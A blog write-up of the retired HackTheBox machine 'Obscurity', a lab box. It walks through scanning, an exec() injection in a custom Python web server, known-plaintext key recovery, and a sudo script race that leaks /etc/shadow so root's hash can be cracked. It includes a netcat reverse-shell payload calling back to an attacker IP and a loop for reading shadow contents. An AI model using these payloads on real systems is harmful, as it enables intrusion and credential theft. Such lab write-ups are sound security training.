HackTheBox - Obscurity

Summary

Obscurity, a Linux box created by HackTheBox user clubby789, was a medium difficulty box overall. The initial foothold came from finding the source code of the web server and analysing it to find an RCE, which gets us a low-privilege shell. In the user's home directory there is a Python encryption script we can use to recover the user's password. As that user we can run a Python script meant to replace SSH, which lets us read root's password hash; cracking it gives us root.

Initial Scan

nmap

# Nmap 7.80 scan initiated Sat Nov 30 15:01:37 2019 as: nmap -sC -sV -oN nmap/obscurity 10.10.10.168
Nmap scan report for 10.10.10.168
Host is up (0.14s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 33:d3:9a:0d:97:2c:54:20:e1:b0:17:34:f4:ca:70:1b (RSA)
| 256 f6:8b:d5:73:97:be:52:cb:12:ea:8b:02:7c:34:a3:d7 (ECDSA)
|_ 256 e8:df:55:78:76:85:4b:7b:dc:70:6a:fc:40:cc:ac:9b (ED25519)
80/tcp closed http
8080/tcp open http-proxy BadHTTPServer
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Date: Sat, 30 Nov 2019 20:01:50
| Server: BadHTTPServer
| Last-Modified: Sat, 30 Nov 2019 20:01:50
| Content-Length: 4171
| Content-Type: text/html
| Connection: Closed
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>0bscura</title>
| <meta http-equiv="X-UA-Compatible" content="IE=Edge">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta name="keywords" content="">
| <meta name="description" content="">
| <!--
| Easy Profile Template
| http://www.templatemo.com/tm-467-easy-profile
| <!-- stylesheet css -->
| <link rel="stylesheet" href="css/bootstrap.min.css">
| <link rel="stylesheet" href="css/font-awesome.min.css">
| <link rel="stylesheet" href="css/templatemo-blue.css">
| </head>
| <body data-spy="scroll" data-target=".navbar-collapse">
| <!-- preloader section -->
| <!--
| <div class="preloader">
| <div class="sk-spinner sk-spinner-wordpress">
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Sat, 30 Nov 2019 20:01:51
| Server: BadHTTPServer
| Last-Modified: Sat, 30 Nov 2019 20:01:51
| Content-Length: 4171
| Content-Type: text/html
| Connection: Closed
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>0bscura</title>
| <meta http-equiv="X-UA-Compatible" content="IE=Edge">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta name="keywords" content="">
| <meta name="description" content="">
| <!--
| Easy Profile Template
| http://www.templatemo.com/tm-467-easy-profile
| <!-- stylesheet css -->
| <link rel="stylesheet" href="css/bootstrap.min.css">
| <link rel="stylesheet" href="css/font-awesome.min.css">
| <link rel="stylesheet" href="css/templatemo-blue.css">
| </head>
| <body data-spy="scroll" data-target=".navbar-collapse">
| <!-- preloader section -->
| <!--
| <div class="preloader">
|_ <div class="sk-spinner sk-spinner-wordpress">
|_http-server-header: BadHTTPServer
|_http-title: 0bscura
9000/tcp closed cslistener
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.80%I=7%D=11/30%Time=5DE2CAB0%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,10FC,"HTTP/1\.1\x20200\x20OK\nDate:\x20Sat,\x2030\x20Nov\x202
SF:019\x2020:01:50\nServer:\x20BadHTTPServer\nLast-Modified:\x20Sat,\x2030
SF:\x20Nov\x202019\x2020:01:50\nContent-Length:\x204171\nContent-Type:\x20
SF:text/html\nConnection:\x20Closed\n\n<!DOCTYPE\x20html>\n<html\x20lang=\
SF:"en\">\n<head>\n\t<meta\x20charset=\"utf-8\">\n\t<title>0bscura</title>
SF:\n\t<meta\x20http-equiv=\"X-UA-Compatible\"\x20content=\"IE=Edge\">\n\t
SF:<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20initial-
SF:scale=1\">\n\t<meta\x20name=\"keywords\"\x20content=\"\">\n\t<meta\x20n
SF:ame=\"description\"\x20content=\"\">\n<!--\x20\nEasy\x20Profile\x20Temp
SF:late\nhttp://www\.templatemo\.com/tm-467-easy-profile\n-->\n\t<!--\x20s
SF:tylesheet\x20css\x20-->\n\t<link\x20rel=\"stylesheet\"\x20href=\"css/bo
SF:otstrap\.min\.css\">\n\t<link\x20rel=\"stylesheet\"\x20href=\"css/font-
SF:awesome\.min\.css\">\n\t<link\x20rel=\"stylesheet\"\x20href=\"css/templ
SF:atemo-blue\.css\">\n</head>\n<body\x20data-spy=\"scroll\"\x20data-targe
SF:t=\"\.navbar-collapse\">\n\n<!--\x20preloader\x20section\x20-->\n<!--\n
SF:<div\x20class=\"preloader\">\n\t<div\x20class=\"sk-spinner\x20sk-spinne
SF:r-wordpress\">\n")%r(HTTPOptions,10FC,"HTTP/1\.1\x20200\x20OK\nDate:\x2
SF:0Sat,\x2030\x20Nov\x202019\x2020:01:51\nServer:\x20BadHTTPServer\nLast-
SF:Modified:\x20Sat,\x2030\x20Nov\x202019\x2020:01:51\nContent-Length:\x20
SF:4171\nContent-Type:\x20text/html\nConnection:\x20Closed\n\n<!DOCTYPE\x2
SF:0html>\n<html\x20lang=\"en\">\n<head>\n\t<meta\x20charset=\"utf-8\">\n\
SF:t<title>0bscura</title>\n\t<meta\x20http-equiv=\"X-UA-Compatible\"\x20c
SF:ontent=\"IE=Edge\">\n\t<meta\x20name=\"viewport\"\x20content=\"width=de
SF:vice-width,\x20initial-scale=1\">\n\t<meta\x20name=\"keywords\"\x20cont
SF:ent=\"\">\n\t<meta\x20name=\"description\"\x20content=\"\">\n<!--\x20\n
SF:Easy\x20Profile\x20Template\nhttp://www\.templatemo\.com/tm-467-easy-pr
SF:ofile\n-->\n\t<!--\x20stylesheet\x20css\x20-->\n\t<link\x20rel=\"styles
SF:heet\"\x20href=\"css/bootstrap\.min\.css\">\n\t<link\x20rel=\"styleshee
SF:t\"\x20href=\"css/font-awesome\.min\.css\">\n\t<link\x20rel=\"styleshee
SF:t\"\x20href=\"css/templatemo-blue\.css\">\n</head>\n<body\x20data-spy=\
SF:"scroll\"\x20data-target=\"\.navbar-collapse\">\n\n<!--\x20preloader\x2
SF:0section\x20-->\n<!--\n<div\x20class=\"preloader\">\n\t<div\x20class=\"
SF:sk-spinner\x20sk-spinner-wordpress\">\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 30 15:02:14 2019 -- 1 IP address (1 host up) scanned in 37.66 seconds

If we navigate to the website on port 8080 we see a web page for a company with a rather interesting take on security.
At the bottom of the page we read something interesting:

Message to server devs:the current source code for the webserver is in 'SuperSecureServer.py' in the secret development directory.

So we can run wfuzz to find the code.

wfuzz -c -w /usr/share/wordlists/dirb/small.txt 10.10.10.168:8080/FUZZ/SuperSecureServer.py

which reveals that the code is in the develop directory.

Getting the code and analyzing it

info = "output = 'Document: {}'" # Keep the output for later debug
exec(info.format(path)) # This is how you do string formatting, right?

Since we control the path, we can use it to break out of the string literal and get exec() to run the code we want.
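To see the bug in isolation, here is an added example (my code, not the box's server) that runs the two quoted lines inside a scope dictionary and contrasts them with the version that formats the path without exec; the helper names and the marker path are mine.

```python
"""Why exec(info.format(path)) is an injection, and what the fix looks like."""


def build_output_vulnerable(path: str) -> dict:
    # Mirrors the server: the request path is formatted into Python source
    # text and then executed, so a quote character in the path ends the
    # string literal and whatever follows runs as code.
    info = "output = 'Document: {}'"
    scope: dict = {}
    exec(info.format(path), scope)  # the bug: exec over attacker-controlled data
    return scope


def build_output_fixed(path: str) -> dict:
    # Same formatting, no exec: the path is treated purely as data.
    return {"output": "Document: {}".format(path)}


# Constructed, harmless marker path: closes the literal, assigns a variable,
# then re-opens a literal so the generated source still parses.
MARKER_PATH = "'; injected = True; a='a"

if __name__ == "__main__":
    print("injected" in build_output_vulnerable(MARKER_PATH))  # True
    print("injected" in build_output_fixed(MARKER_PATH))       # False
```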

so we can execute the payload with

10.10.10.168:8080/'; os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.X.X 9000 >/tmp/f");a='a

which gives us a shell as www-data.

Checking robert's home directory we find SuperSecureCrypt.py, an encrypted file containing robert's password, and a sample plaintext file together with its encrypted version.

Using the plaintext and the sample encrypted file we can recover the key:

from SuperSecureCrypt import decrypt  # the box's own cipher script, copied from /home/robert

# Ciphertext of the sample file; decrypting it with the known plaintext as the key yields the key stream
utfenc ="¦ÚÈêÚÞØÛÝ݉×ÐÊ߅ÞÊÚɒæßÝˈÚÛÚêÙÉëéÑÒÝÍЅêÆáÙÞã–ÒшÐáÙ¦Õæ؞ãÊÎ́ßÚêƎÝáäè‰ÎÍڌÎëÑÓäáÛÌ׉v"
decrypted = decrypt(utfenc,"Encrypting this file with your key should result in out.txt, make sure your key is correct!")
print(decrypted)

which reveals the key as alexandrovich. Decrypting passwordreminder.txt with it gives the password SecThruOBsFTW,

which gives us the user robert, and we can read user.txt.
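The key-recovery trick above works because the cipher is additive. As an added example (mine, not the box's SuperSecureCrypt.py, whose source the writeup does not quote), the block below assumes the cipher shifts each character by the matching key character modulo 255 with the key repeating, and shows the general form of the trick: decrypt the ciphertext with the plaintext as the key, then extract the shortest repeating period.

```python
"""Recovering an additive-cipher key from a known plaintext/ciphertext pair."""


# Assumed cipher (not quoted on the page): character-wise shift by the
# repeating key, modulo 255.
def encrypt(text: str, key: str) -> str:
    return "".join(chr((ord(c) + ord(key[i % len(key)])) % 255)
                   for i, c in enumerate(text))


def decrypt(text: str, key: str) -> str:
    return "".join(chr((ord(c) - ord(key[i % len(key)])) % 255)
                   for i, c in enumerate(text))


def shortest_period(s: str) -> str:
    """Shortest prefix of s whose repetition reproduces all of s."""
    for p in range(1, len(s) + 1):
        if all(s[i] == s[i % p] for i in range(len(s))):
            return s[:p]
    return s


def recover_key(ciphertext: str, known_plaintext: str) -> str:
    """c = (p + k) mod 255, so (c - p) mod 255 = k: decrypting the
    ciphertext with the plaintext as the key returns the key stream, i.e.
    the key repeated to the plaintext length. The plaintext must be at
    least as long as the key (ideally several times longer); otherwise only
    a prefix of the key comes back and the period search is unreliable."""
    keystream = decrypt(ciphertext, known_plaintext)
    return shortest_period(keystream)


# Constructed sample pair: the box's key and the sample plaintext the
# writeup uses, encrypted here with the assumed cipher.
KEY = "alexandrovich"
SAMPLE_PLAIN = ("Encrypting this file with your key should result in out.txt, "
                "make sure your key is correct!")
SAMPLE_CIPHER = encrypt(SAMPLE_PLAIN, KEY)

if __name__ == "__main__":
    print(recover_key(SAMPLE_CIPHER, SAMPLE_PLAIN))  # alexandrovich
```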

Privilege Escalation

Now that we are user robert, we see that there is BetterSSH.py in /home/robert/BetterSSH/.

Checking sudo -l shows:

User robert may run the following commands on obscure:
(ALL) NOPASSWD: /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py

For some reason the script copies the contents of the shadow file to a randomly named file in /tmp/SSH.

So open two terminal sessions and run

while true; do cat /tmp/SSH/* 2>/dev/null; done

in one of the sessions,

and in the other run sudo /home/robert/BetterSSH/BetterSSH.py, entering test as the username and test as the password, which gives an invalid-password error.

But in the first terminal we see the contents of the shadow file, so we can grab the root password hash:

$6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1

We can crack the hash using John the Ripper and rockyou.txt, which gives us the password mercedes.

So we can ssh to the box as root:mercedes and grab root.txt:

root@obscure:~# id;hostname;cut -c 1-15 /root/root.txt
uid=0(root) gid=0(root) group=0(root)
obscure
512fd4429f33a11

and we have pwned Obscurity 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/obscurity/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.